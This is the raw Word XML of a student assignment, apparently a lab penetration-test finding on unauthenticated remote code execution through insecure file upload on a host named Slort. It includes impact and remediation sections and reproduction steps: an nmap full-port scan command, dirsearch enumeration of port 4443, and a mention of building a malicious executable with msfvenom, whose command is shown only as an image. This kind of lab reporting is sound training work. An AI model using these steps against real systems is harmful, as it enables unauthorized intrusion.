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9AF9A" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>CSOC 1020: Assignment #3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420F23E" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6"/>
    <w:p w14:paraId="1DD7A272" w14:textId="06BAE28B" w:rsidR="00123DCA" w:rsidRPr="00782E20" w:rsidRDefault="00362398" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unauthenticated Remote Code Execution through </w:t>
      </w:r>
      <w:r w:rsidR="00DD3626">
        <w:t xml:space="preserve">Insecure File </w:t>
      </w:r>
      <w:r w:rsidR="00D44BC3">
        <w:t>Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76262C90" w14:textId="77777777" w:rsidR="00782E20" w:rsidRPr="00782E20" w:rsidRDefault="00782E20" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BC6420" w14:textId="77777777" w:rsidR="00123DCA" w:rsidRDefault="3EE847B1" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc137283760"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6E47412D" w14:textId="0E452E9B" w:rsidR="00C341CA" w:rsidRPr="00C341CA" w:rsidRDefault="00A67037" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The evaluated IP in the scope, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Slort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (192.168.225.53), has been identified to possess a notable security vulnerability present on port 4443, which when exploited, results in the attainment of Remote Code Execution (RCE). The way the web application Port is constructed raises vulnerabilities on the client-side.</w:t>
      </w:r>
      <w:r w:rsidR="00C341CA">
        <w:t xml:space="preserve"> To elaborate, the configuration or design of the web application’s port on 4443 has been established in a way that permits malicious actors to manipulate the application’s behavior. By exploiting this configuration, attacks can execute arbitrary code remotely, effectively gaining unauthorized control over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48238903" w14:textId="1770D50A" w:rsidR="007356F4" w:rsidRDefault="007356F4" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE8F101" w14:textId="59BA0B3A" w:rsidR="00123DCA" w:rsidRDefault="3EE847B1" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc137283761"/>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4A37C789" w14:textId="53EF487B" w:rsidR="00C70ED3" w:rsidRDefault="00A82DF8" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The impact of the vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="000F01D0">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>s severe, as it allows attackers to achieve remote code execution</w:t>
      </w:r>
      <w:r w:rsidR="000F01D0">
        <w:t xml:space="preserve"> without having credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gaining unauthorized access and control over the target in scope. An attacker can upload a malicious executable file on </w:t>
      </w:r>
      <w:r w:rsidR="00AE33FE">
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4443 and start a listener to execute arbitrary commands as Low privileged user (Rupert).  </w:t>
      </w:r>
      <w:r w:rsidR="00C341CA">
        <w:t xml:space="preserve">The attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00362398">
        <w:t>utilize</w:t>
      </w:r>
      <w:r w:rsidR="00C341CA">
        <w:t xml:space="preserve"> the compromised system with the privileges of the user. This means that they can execute actions and operations that “Rupert” would normally have access to, potentially including sensitive data and system settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6786821F" w14:textId="2948616A" w:rsidR="00B455E7" w:rsidRDefault="00B455E7" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B455E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Please refer to this link to know more about Unrestricted File Upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0726A934" w14:textId="574B0518" w:rsidR="00B455E7" w:rsidRDefault="00000000" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00B455E7" w:rsidRPr="00353D14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="282D1DE4" w14:textId="77777777" w:rsidR="008B6477" w:rsidRDefault="008B6477" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67094FF1" w14:textId="6180DCB1" w:rsidR="00123DCA" w:rsidRDefault="3EE847B1" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc137283762"/>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="1DB208AF" w14:textId="0EFA1901" w:rsidR="00362398" w:rsidRDefault="00362398" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implement robust server-side input validation and sanitization for all user-provided inputs, ensuring that any data submitted to the server is thoroughly checked for validity and security. Regularly review and update the server and application configurations. Disable unnecessary services, ports, and features to minimize the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F16FB8" w14:textId="77777777" w:rsidR="00585946" w:rsidRDefault="00585946" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767F3A39" w14:textId="15C5EB7E" w:rsidR="001435BC" w:rsidRDefault="001435BC" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc137283763"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1D737D3C" w14:textId="38B2E1A7" w:rsidR="00842F5A" w:rsidRDefault="00842F5A" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7038E0" w14:textId="36F64620" w:rsidR="00013CF5" w:rsidRDefault="00FB4DAE" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">We started the enumeration process of the IP in scope (192.168.225.53) with </w:t>
      </w:r>
      <w:r w:rsidR="0056068A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2024">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -n -p- 192.168.225.53</w:t>
      </w:r>
      <w:r w:rsidR="0056068A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>”. We found ports 8080 and 4443 which are meant for communications on the web application to be open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184283C" w14:textId="77777777" w:rsidR="00664DF6" w:rsidRDefault="00664DF6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC10D43" w14:textId="44D0312C" w:rsidR="00E77E66" w:rsidRDefault="00013CF5"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1FB4858" wp14:editId="77EF2E79">
            <wp:extent cx="8229600" cy="3129280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6463586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58683"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229600" cy="3129280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A32A7" w14:textId="77777777" w:rsidR="00FA047F" w:rsidRDefault="00FA047F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BB2CFB" w14:textId="77777777" w:rsidR="00842F5A" w:rsidRDefault="00842F5A" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6978973C" w14:textId="798D185A" w:rsidR="002D4156" w:rsidRPr="0056068A" w:rsidRDefault="0056068A" w:rsidP="006A02FE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To further enumerate </w:t>
      </w:r>
      <w:r w:rsidR="005E05E5">
        <w:t>Port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4443, we use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF2024">
        <w:t>(a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory brute force tool) to ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0056068A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>see</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:t>the directories which return a code of 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0883908E" w14:textId="77777777" w:rsidR="00842F5A" w:rsidRDefault="00842F5A" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272EA1D7" w14:textId="4BD8FC96" w:rsidR="00BA22BF" w:rsidRDefault="00013CF5"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5E5EEB1F" wp14:editId="0A46228A">
            <wp:extent cx="8229600" cy="3837305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9851633"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633" name="Picture 4" descr="A computer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29600" cy="3837305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6AA8AF" w14:textId="7B996A10" w:rsidR="00FA047F" w:rsidRDefault="00FA047F" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07CE72F0" w14:textId="77777777" w:rsidR="009A25E2" w:rsidRDefault="009A25E2" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302B0ED4" w14:textId="77777777" w:rsidR="002D4156" w:rsidRDefault="002D4156" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24464666" w14:textId="77777777" w:rsidR="002D4156" w:rsidRDefault="002D4156" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75ACD08C" w14:textId="77777777" w:rsidR="002D4156" w:rsidRDefault="002D4156" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125F055D" w14:textId="77777777" w:rsidR="00664DF6" w:rsidRDefault="00664DF6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCCEC62" w14:textId="77777777" w:rsidR="00556153" w:rsidRDefault="00556153" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D468DB9" w14:textId="77777777" w:rsidR="002D4156" w:rsidRDefault="002D4156" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2761FA66" w14:textId="77777777" w:rsidR="0056068A" w:rsidRDefault="0056068A" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A0A5C5" w14:textId="7EF956CC" w:rsidR="0056068A" w:rsidRDefault="0056068A"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The image below shows a ‘200’ response of “</w:t>
      </w:r>
      <w:r w:rsidRPr="0056068A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://192.168.225.53:4443/site/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E715FA" w14:textId="77777777" w:rsidR="0056068A" w:rsidRDefault="0056068A" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4623E18A" w14:textId="007D66FF" w:rsidR="009A25E2" w:rsidRDefault="00013CF5"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5E4EBAC" wp14:editId="56002B64">
            <wp:extent cx="8229600" cy="3216275"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="13508735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73588"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216275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1249E2F1" w14:textId="5898FF44" w:rsidR="00AB5FED" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">To see if we get a response from the server, beforehand, we created a malicious executable with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E05E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> highlighted below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE7EAA8" w14:textId="77777777" w:rsidR="00556153" w:rsidRDefault="00556153" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52258BB2" w14:textId="1902C517" w:rsidR="00AB5FED" w:rsidRDefault="00013CF5"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A4FD03C" wp14:editId="2C2F6A81">
            <wp:extent cx="8229600" cy="922020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16644254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25473" name="Picture 1664425473"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8229600" cy="922020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD980F" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B547DF9" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713C00B1" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096AC0D3" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0404E0DC" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25516252" w14:textId="77777777" w:rsidR="005E05E5" w:rsidRDefault="005E05E5" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
